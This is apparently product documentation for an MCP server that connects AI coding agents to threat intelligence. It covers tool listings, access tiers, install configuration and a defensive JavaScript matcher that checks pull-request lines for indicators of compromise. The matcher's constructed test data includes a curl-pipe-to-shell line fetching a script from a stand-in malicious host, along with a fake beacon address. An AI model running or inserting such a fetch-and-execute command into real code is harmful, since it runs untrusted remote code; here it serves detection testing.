Published: March 2026 | Last reviewed: March 22, 2026
// model_context_protocol

Threat Intelligence for AI Agents

The Threadlinqs MCP Server connects AI coding agents directly to live threat intelligence. 28 tools expose threat search, detection export, IOC enrichment, MITRE mapping, C2 tracking, and more through the Model Context Protocol standard.

28 MCP Tools
8 Resource Types
15 Free Tier Tools
20+ API Endpoints

What Is MCP?

The Model Context Protocol is an open standard that lets AI assistants connect to external data sources and tools. Instead of copy-pasting threat intelligence into a chat window, your AI agent calls the Threadlinqs MCP Server directly to search threats, pull detections, enrich IOCs, and map MITRE techniques in real time.

MCP works with Claude Code, Cursor, Windsurf, VS Code Copilot, and any MCP-compatible client. The server runs locally via stdio transport: the client spawns it as a child process and talks to it over stdin/stdout, the API key is handed to that process through its environment and is used only for the server's own calls to the Threadlinqs API, and the key is not part of the prompt the model sees.

Installation

One command fetches and runs the server. No build step, no Docker, no infrastructure.

Terminal:
npx intelthreadlinqs-mcp

Because npx resolves the package from the npm registry, this runs whatever version is current at launch time. For anything beyond a first trial, pin a specific package version in the command and in the client configuration below, so that a changed or compromised release cannot silently replace the server your agent talks to.

Or add it to your MCP client configuration:

JSON:
{
  "mcpServers": {
    "threadlinqs-intel": {
      "command": "npx",
      "args": ["-y", "intelthreadlinqs-mcp"],
      "env": {
        "THREADLINQS_API_KEY": "your-api-key-here"
      }
    }
  }
}

15 of the 28 tools (those badged free in the list below) work on the free tier without an API key. Setting THREADLINQS_API_KEY unlocks the rest: detection export, the C2 intelligence suite, threat simulations and the correlation engine. The key sits in plaintext in the client configuration file, so keep that file out of version control and off shared machines.

28 Tools Across 11 Domains

Every tool is typed, documented, and returns structured JSON that AI agents can reason over directly.

Badges: free = no API key needed; blue = Blue Analyst; red = Red Professional; purple = Purple SME.

Threats (4 tools)

search_threats [free]: Full-text search across all tracked threats
get_threat [free]: Full threat report by ID with timeline, IOCs, detections
get_recent_threats [free]: Latest threats added to the platform
list_threat_categories [free]: All threat categories with counts

Detections (2 tools)

get_detections [blue]: Detection rules for a specific threat
export_detection [blue]: Export a rule in SPL, KQL, or Sigma format

IOCs & Enrichment (1 tool)

search_iocs [free]: Search indicators of compromise across all threats

MITRE ATT&CK (2 tools)

get_mitre_coverage [free]: Full MITRE technique coverage map
get_mitre_technique [free]: Technique details with linked threats and detections

C2 Intelligence (7 tools)

list_c2_beacons [red]: Active C2 beacon infrastructure
get_c2_configs [red]: Extracted C2 configurations
get_c2_watermarks [red]: Operator watermark tracking
get_c2_operators [red]: Operator cluster fingerprints
get_c2_timeline [red]: Infrastructure timeline events
get_c2_stats [red]: Aggregate C2 statistics
get_c2_cross_correlations [red]: Cross-infrastructure correlation engine

Simulations, Debriefs & More (12 tools)

get_threat_simulations [purple]: Attack simulation scripts per threat
list_simulations [purple]: Browse all simulation scenarios
list_debriefs [free]: Daily intelligence debriefs
get_debrief [free]: Full debrief for a specific date
get_correlation_engine [purple]: Advanced cross-threat correlations
get_correlations_overview [purple]: Correlation engine summary stats
get_threat_transcripts [free]: Structured analysis transcripts
get_cve_details [free]: CVE vulnerability enrichment
get_cwe_details [free]: CWE weakness details
get_platform_stats [free]: Platform-wide aggregate statistics
get_changelog [free]: Platform release changelog
get_roadmap [free]: Upcoming platform features

Example: Security-Aware Code Review

An AI agent reviewing a pull request can query the MCP server to check whether any IOCs or techniques from recent threats appear in the codebase, then suggest detection rules directly.

Agent prompt:
"Search for threats related to supply chain attacks, then get the MITRE techniques for T1195 and show me detection rules I can deploy to Sentinel."

The agent calls, in order:
1. search_threats({ query: "supply chain" })
2. get_mitre_technique({ technique_id: "T1195" })
3. export_detection({ id: 42, format: "kql" })

The id in step 3 (42 is a placeholder) is taken from the detections that step 2 returns alongside the technique, and the format is kql because Microsoft Sentinel analytics rules are written in KQL. Step 3 is a Blue Analyst tool, so this workflow needs THREADLINQS_API_KEY set; the first two steps run on the free tier.
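What the "check whether any IOCs appear in the codebase" step amounts to, as an added example that is not Threadlinqs code: a matcher that takes indicator records (assumed shape { type, value }, as a search_iocs reply might carry them) and scans pull-request lines for them, refanging the defanged forms threat feeds use so that hxxp://pkg-mirror[.]example still matches the live URL in code. It goes slightly beyond a literal string compare: a host matches a domain indicator when it is a subdomain of it, and hashes and addresses are matched on token boundaries so a partial overlap does not count. All indicators and code lines are constructed; the hostnames use a reserved example TLD and the address comes from a documentation range.

```javascript
// Added example, not part of the Threadlinqs server or any tool it exposes.
// Checks source or diff lines against the indicators an IOC lookup returned.
// Assumptions: indicator records look like { type, value } with the type
// names below, and all sample data is constructed for this example.

const INDEXED_TYPES = new Set(["domain", "ipv4", "sha256", "sha1", "md5"]);

// Threat-intel output is usually defanged (hxxp, [.]) so it cannot be clicked;
// undo that and lower-case so it compares against what appears in code.
function refang(value) {
  return value.trim().toLowerCase()
    .replace(/hxxp(s?):\/\//g, "http$1://")
    .replace(/\[\.\]|\(\.\)|\{\.\}/g, ".")
    .replace(/\[:\]/g, ":")
    .replace(/\[@\]/g, "@");
}

// Lookup table: type -> Set of normalized indicator values.
function indexIndicators(indicators) {
  const index = new Map();
  for (const { type, value } of indicators) {
    if (!INDEXED_TYPES.has(type)) continue; // e.g. "url": not matched here, not guessed at
    if (!index.has(type)) index.set(type, new Set());
    index.get(type).add(refang(value));
  }
  return index;
}

// What a candidate of each type looks like inside a line of code.
const CANDIDATES = {
  ipv4: /\b(?:\d{1,3}\.){3}\d{1,3}\b/g,
  sha256: /\b[a-f0-9]{64}\b/g,
  sha1: /\b[a-f0-9]{40}\b/g,
  md5: /\b[a-f0-9]{32}\b/g,
  domain: /\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b/g,
};

// Every line that carries a known indicator. A host matches a domain
// indicator when it equals it or is a subdomain of it; other types match exactly.
function findIocHits(lines, index) {
  const hits = [];
  lines.forEach((raw, i) => {
    const line = refang(raw); // code can carry defanged strings too (fixtures, comments)
    for (const [type, re] of Object.entries(CANDIDATES)) {
      const known = index.get(type);
      if (!known) continue;
      for (const m of line.matchAll(re)) {
        const token = m[0];
        const indicator = type === "domain"
          ? [...known].find((d) => token === d || token.endsWith("." + d))
          : (known.has(token) ? token : undefined);
        if (indicator) hits.push({ line: i + 1, type, indicator, text: raw });
      }
    }
  });
  return hits;
}

// Constructed sample: indicators as a threat feed would report them (defanged,
// reserved example TLD and documentation address range), and lines from a PR.
const SAMPLE_INDICATORS = [
  { type: "domain", value: "pkg-mirror[.]example" },
  { type: "ipv4", value: "203.0.113[.]45" },
  { type: "sha256", value: "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" },
  { type: "url", value: "hxxp://pkg-mirror[.]example/postinstall.sh" }, // skipped by the index
];

const SAMPLE_LINES = [
  'REGISTRY = "https://registry.npmjs.org/"',
  'curl -fsSL http://cdn.pkg-mirror.example/postinstall.sh | sh',
  'BEACON = "203.0.113.45:8443"',
  'EXPECTED = "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"',
  'OTHER = "203.0.113.46"',
];

// Run the matcher over the constructed sample; returns the hit list.
function reviewSample() {
  return findIocHits(SAMPLE_LINES, indexIndicators(SAMPLE_INDICATORS));
}
```

On the sample, lines 2, 3 and 4 are reported (the subdomain of the bad host, the beacon address, and the known hash) while the benign registry URL and the neighbouring address 203.0.113.46 are not. The url indicator is deliberately left out of the index rather than split into host and path by guesswork; a real agent would normalise URLs separately or ask the server for the domain form.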

Access Tiers

Tools are gated by subscription tier to match the data sensitivity and compute cost of each operation. The counts below follow the tier badges in the tool list above.

Free / Unverified (15 tools)
Threat search, single threat reports, recent threats, categories, IOC search, MITRE coverage and technique details, debriefs, transcripts, CVE/CWE lookups, platform stats, changelog, roadmap.
Blue Analyst (2 tools)
Detection rule retrieval and export in SPL, KQL, and Sigma formats.
Red Professional (7 tools)
Full C2 intelligence suite: beacons, configs, watermarks, operators, timeline, stats, cross-correlations.
Purple SME (4 tools)
Attack simulations (per threat and the full scenario list), the advanced correlation engine, and its overview analytics.
// author
Threadlinqs Intel Team
Security Engineer at Threadlinqs Intelligence. Researching active threats, building detection rules, and mapping adversary tradecraft across SPL, KQL, and Sigma.
medium.com/@hatim.bakkali10

Give your AI agent access to live threat intelligence. Install the MCP server now.
